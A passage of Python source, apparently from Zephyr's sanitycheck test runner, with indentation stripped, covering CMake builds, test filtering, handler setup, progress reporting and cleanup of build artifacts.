p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|RAM|SRAM)' overflowed by", log_msg)
if res:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
else:
self.instance.status = "error"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
ldflags = "-Wl,--fatal-warnings"
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
# fixme: add additional cflags based on options
cmake_args = [
'-B{}'.format(self.build_dir),
'-S{}'.format(self.source_dir),
'-DEXTRA_CFLAGS="-Werror ',
'-DEXTRA_AFLAGS=-Wa,--fatal-warnings',
'-DEXTRA_LDFLAGS="{}'.format(ldflags),
'-G{}'.format(self.generator)
]
if self.cmake_only:
cmake_args.append("-DCMAKE_EXPORT_COMPILE_COMMANDS=1")
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "error"
self.instance.reason = "Cmake build failure"
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a") as log:
log_msg = out.decode(sys.getdefaultencoding())
log.write(log_msg)
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-sanitycheck.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
dts_path = os.path.join(self.build_dir, "zephyr", self.platform.name + ".dts.pre.tmp")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(dts_path):
edt = edtlib.EDT(dts_path, [os.path.join(ZEPHYR_BASE, "dts", "bindings")],
warn_reg_unit_address_mismatch=False)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.ubsan = kwargs.get('ubsan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.ubsan = self.ubsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
def process(self, message):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
results = self.cmake()
if self.instance.status in ["failed", "error"]:
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in results['filter'] and results['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
results = self.build()
if not results:
self.instance.status = "error"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
if results.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.run:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
logger.debug(f"run status: {self.instance.status}")
pipeline.put({
"op": "report",
"test": self.instance,
"state": "executed",
"status": self.instance.status,
"reason": self.instance.reason}
)
# Report results and output progress to screen
elif op == "report":
with report_lock:
self.report_out()
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
self.cleanup_artifacts()
def cleanup_artifacts(self):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
whitelist = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
whitelist = [os.path.join(self.instance.build_dir, file) for file in whitelist]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in whitelist:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def report_out(self):
total_tests_width = len(str(self.suite.total_tests))
self.suite.total_done += 1
instance = self.instance
if instance.status in ["error", "failed", "timeout"]:
if instance.status == "error":
self.suite.total_errors += 1
self.suite.total_failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
self.suite.total_skipped += 1
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
elif instance.status == "passed":
self.suite.total_passed += 1
status = Fore.GREEN + "PASSED" + Fore.RESET
else:
logger.debug(f"Unknown status = {instance.status}")
status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
self.suite.total_done, total_tests_width, self.suite.total_tests, instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["error", "failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
self.suite.total_done,
self.suite.total_tests,
Fore.RESET,
int((float(self.suite.total_done) / self.suite.total_tests) * 100),
Fore.YELLOW if self.suite.total_skipped > 0 else Fore.RESET,
self.suite.total_skipped,
Fore.RESET,
Fore.RED if self.suite.total_failed > 0 else Fore.RESET,
self.suite.total_failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if (self.testcase.extra_configs or self.coverage or
self.asan or self.ubsan):
overlays.append(os.path.join(instance.build_dir,
"sanitycheck", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
results = self.run_cmake(args)
return results
def build(self):
results = self.run_build(['--build', self.build_dir])
return results
def run(self):
instance = self.instance
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
class BoundedExecutor(concurrent.futures.ThreadPoolExecutor):
"""BoundedExecutor behaves as a ThreadPoolExecutor which will block on
calls to submit() once the limit given as "bound" work items are queued for
execution.
:param bound: Integer - the maximum number of items in the work queue
:param max_workers: Integer - the size of the thread pool
"""
def __init__(self, bound, max_workers, **kwargs):
super().__init__(max_workers)
# self.executor = ThreadPoolExecutor(max_workers=max_workers)
self.semaphore = BoundedSemaphore(bound + max_workers)
def submit(self, fn, *args, **kwargs):
self.semaphore.acquire()
try:
future = super().submit(fn, *args, **kwargs)
except Exception:
self.semaphore.release()
raise
else:
future.add_done_callback(lambda x: self.semaphore.release())
return future
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "testcase-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_whitelist": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_whitelist": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_whitelist": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk",
"sanity_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.platforms = []
self.selected_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_tests = 0 # number of test instances
self.total_cases = 0 # number of test cases
self.total_done = 0 # tests completed
self.total_failed = 0
self.total_skipped = 0
self.total_passed = 0
self.total_errors = 0
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
self.cv = threading.Condition()
# hardcoded for now
self.connected_hardware = []
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + "/")}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update(self):
self.total_tests = len(self.instances)
self.total_cases = len(self.testcases)
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.info("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def misc_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage <
(footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if instance.metrics['handler_time']:
run += 1
if self.total_tests and self.total_tests != self.total_skipped:
pass_rate = (float(self.total_passed) / float(
self.total_tests - self.total_skipped))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} tests passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
self.total_passed,
self.total_tests - self.total_skipped,
Fore.RESET,
pass_rate,
Fore.RED if self.total_failed else Fore.RESET,
self.total_failed,
Fore.RESET,
self.total_skipped,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
if self.platforms:
logger.info("In total {} test cases were executed on {} out of total {} platforms ({:02.2f}%)".format(
self.total_cases,
len(self.selected_platforms),
self.total_platforms,
(100 * len(self.selected_platforms) / len(self.platforms))
))
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} tests executed on platforms, \
{Fore.RED}{self.total_tests - run}{Fore.RESET} tests were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed):
if not self.instances:
return
if name:
report_name = name
else:
report_name = "sanitycheck"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False, append=only_failed)
self.xunit_report(filename + "_report.xml", full_report=True, append=only_failed)
self.csv_report(filename + ".csv")
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
logger.debug("Found platform configuration " + file)
try:
platform = Platform()
platform.load(file)
if platform.sanitycheck:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain = os.environ.get("ZEPHYR_TOOLCHAIN_VARIANT", None) or \
os.environ.get("ZEPHYR_GCC_VARIANT", None)
if toolchain == "gccarmemb":
# Remove this translation when gccarmemb is no longer supported.
toolchain = "gnuarmemb"
try:
if not toolchain:
raise SanityRuntimeError("E: Variable ZEPHYR_TOOLCHAIN_VARIANT is not defined")
except Exception as e:
print(str(e))
sys.exit(2)
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, dirnames, filenames in os.walk(root, topdown=True):
logger.debug("scanning %s" % dirpath)
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
dirnames[:] = []
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = SanityConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_whitelist = tc_dict["arch_whitelist"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_whitelist = tc_dict["platform_whitelist"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_whitelist = tc_dict["toolchain_whitelist"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_from_file(self, file, filter_status=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
instance = TestInstance(self.testcases[test], platform, self.outdir)
instance.check_build_or_run(
self.build_only,
self.enable_slow,
self.device_testing,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
device_testing_filter = kwargs.get('device_testing')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
if platform_filter:
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
else:
platforms = self.platforms
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all used, any --platform arguments ignored
platform_filter = []
elif not platform_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platforms:
instance = TestInstance(tc, plat, self.outdir)
instance.check_build_or_run(
self.build_only,
self.enable_slow,
self.device_testing,
self.fixtures
)
for t in tc.cases:
instance.results[t] = None
if device_testing_filter:
for h in self.connected_hardware:
if h['platform'] == plat.name:
if tc.harness_config.get('fixture') in h.get('fixtures', []):
instance.build_only = False
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = "Platform is excluded on command line."
continue
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if device_testing_filter and instance.build_only:
discards[instance] = "Not runnable on device"
continue
if tc.skip:
discards[instance] = "Skip filter"
continue
if tc.build_on_all and not platform_filter:
platform_filter = []
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = "Command line testcase tag filter"
continue
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = "Command line testcase exclude filter"
continue
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = "Testcase name filter"
continue
if arch_filter and plat.arch not in arch_filter:
discards[instance] = "Command line testcase arch filter"
continue
if not force_platform:
if tc.arch_whitelist and plat.arch not in tc.arch_whitelist:
discards[instance] = "Not in test case arch whitelist"
continue
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = "In test case arch exclude"
continue
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = "In test case platform exclude"
continue
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = "In test case toolchain exclude"
continue
if platform_filter and plat.name not in platform_filter:
discards[instance] = "Command line platform filter"
continue
if tc.platform_whitelist and plat.name not in tc.platform_whitelist:
discards[instance] = "Not in testcase platform whitelist"
continue
if tc.toolchain_whitelist and toolchain not in tc.toolchain_whitelist:
discards[instance] = "Not in testcase toolchain whitelist"
continue
if not plat.env_satisfied:
discards[instance] = "Environment ({}) not satisfied".format(", ".join(plat.env))
continue
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and tc.type != 'unit':
discards[instance] = "Not supported by the toolchain"
continue
if plat.ram < tc.min_ram:
discards[instance] = "Not enough RAM"
continue
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = "No hardware support"
continue
if plat.flash < tc.min_flash:
discards[instance] = "Not enough FLASH"
continue
if set(plat.ignore_tags) & tc.tags:
discards[instance] = "Excluded tags per platform"
continue
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
# if sanitycheck was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all:
if tc.platform_whitelist:
a = set(self.default_platforms)
b = set(tc.platform_whitelist)
c = a.intersection(b)
if c:
aa = list(filter(lambda tc: tc.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list[:1])
else:
instances = list(filter(lambda tc: tc.platform.default, instance_list))
self.add_instances(instances)
for instance in list(filter(lambda inst: not inst.platform.default, instance_list)):
discards[instance] = "Not a default test platform"
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, test_only=False):
for instance in self.instances.values():
if test_only:
if instance.run:
pipeline.put({"op": "run", "test": instance, "status": "built"})
else:
if instance.status not in ['passed', 'skipped', 'error']:
instance.status = None
pipeline.put({"op": "cmake", "test": instance})
return "DONE FEEDING"
def execute(self):
def calc_one_elf_size(instance):
if instance.status not in ["error", "failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
logger.info("Adding tasks to the queue...")
# We can use a with statement to ensure threads are cleaned up promptly
with BoundedExecutor(bound=self.jobs, max_workers=self.jobs) as executor:
# start a future for a thread which sends work in through the queue
future_to_test = {
executor.submit(self.add_tasks_to_queue, self.test_only): 'FEEDER DONE'}
while future_to_test:
# check for status of the futures which are currently working
done, pending = concurrent.futures.wait(future_to_test, timeout=1,
return_when=concurrent.futures.FIRST_COMPLETED)
# if there is incoming work, start a new future
while not pipeline.empty():
# fetch a url from the queue
message = pipeline.get()
test = message['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
ubsan=self.enable_ubsan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose
)
future_to_test[executor.submit(pb.process, message)] = test.name
# process any completed futures
for future in done:
test = future_to_test[future]
try:
data = future.result()
except Exception as exc:
logger.error('%r generated an exception: %s' % (test, exc))
sys.exit('%r generated an exception: %s' % (test, exc))
else:
if data:
logger.debug(data)
# remove the now completed future
del future_to_test[future]
for future in pending:
test = future_to_test[future]
try:
future.result(timeout=180)
except concurrent.futures.TimeoutError:
logger.warning("{} stuck?".format(test))
if self.enable_size_report and not self.cmake_only:
# Parallelize size calculation
executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
futures = [executor.submit(calc_one_elf_size, instance)
for instance in self.instances.values()]
concurrent.futures.wait(futures)
else:
for instance in self.instances.values():
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
instance.metrics["unrecognized"] = []
def discard_report(self, filename):
try:
if not self.discards:
